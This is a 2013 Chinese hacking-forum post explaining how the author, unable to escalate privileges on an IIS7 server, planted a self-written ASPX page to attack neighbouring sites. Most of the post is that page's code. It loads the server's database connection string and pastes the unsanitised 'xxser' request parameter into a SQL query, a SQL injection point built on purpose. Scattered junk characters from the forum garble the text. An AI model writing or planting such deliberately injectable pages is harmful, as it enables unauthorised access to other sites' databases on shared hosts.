标题: 利用aspx构造注射来跨站 [打印本页] 作者: admin 时间: 2013-3-20 21:32 标题: 利用aspx构造注射来跨站 昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。 8 j1 ~: I1 Z1 v) p其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。2 [8 k; @1 ^0 w. @9 b/ W
代码量不多,自己写个拉倒了。烦死了。" I% c. R/ e( l
! l! Z+ o j% |* q4 f3 ]2 [; t
5 B% X9 c& u8 K Q<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> : w1 K9 E: W N5 \, D<html xmlns="http://www.w3.org/1999/xhtml"> ' r! j5 U/ `1 K0 X<head runat="server"> # W, l6 z$ r4 q+ {' a' X8 t- E <title>暗影aspx构造注射专用页面</title>" F$ g: v$ e) @5 ~' O8 f$ X
</head> 5 A1 Z0 C- t; I i6 s<body> % S$ t$ f5 u- [7 c3 F+ @2 X* z <form id="form1" runat="server">: h! @7 U- ^+ a, L8 [* s( h0 z; K
<div>& I4 s8 h% I$ p/ s W! C
<script language="c#" runat="server">; O$ a8 x( T* N3 N% z. L7 R$ a% T3 m
0 G' R. T- j- t f$ _+ L
void page_init(object sender, EventArgs e)) I" H( [9 x# E; i8 F; {
{ , |5 Q4 y/ a! O+ X! t' I1 s # b! ]: a- ~3 A" N2 ` System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(); & @, z C$ D: Y+ _% O' {2 N % f' X# P( h1 X- u conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();$ ?$ c. z# p5 h7 o
conn.Open(); + R* a, f3 o3 \* u3 v. o 8 K; j+ n/ U* r2 P a$ g string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=15 m. o% A O+ [$ \# G: c& T
3 m+ t) R) a T System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn); - D( p6 l. f! P int x = command.ExecuteNonQuery();0 R- [+ w( r% I& L2 D" L+ s
Response.Write(i+"\n");& Q- S# P4 F) T1 k3 {8 w6 N
Response.Write(x);- A z5 \7 J6 H S5 V W( H
conn.Close(); 9 U3 E/ O' ^, ?1 ~" @- r }- L7 X6 e G) c$ m+ b0 V9 S* i
! l0 E& F% l$ Y7 s p4 v
</script>% _0 V. x9 W- B: @* v7 K# d$ U
</div>" {3 c; U- w3 |6 k$ k. o
</form>6 @) }& R1 S/ k9 p3 O7 K6 \$ x% t
</body> ' S: B) W) L7 G- T* u! b6 P</html>6 x6 m& V3 V+ y4 o; P: b7 R8 U5 i" W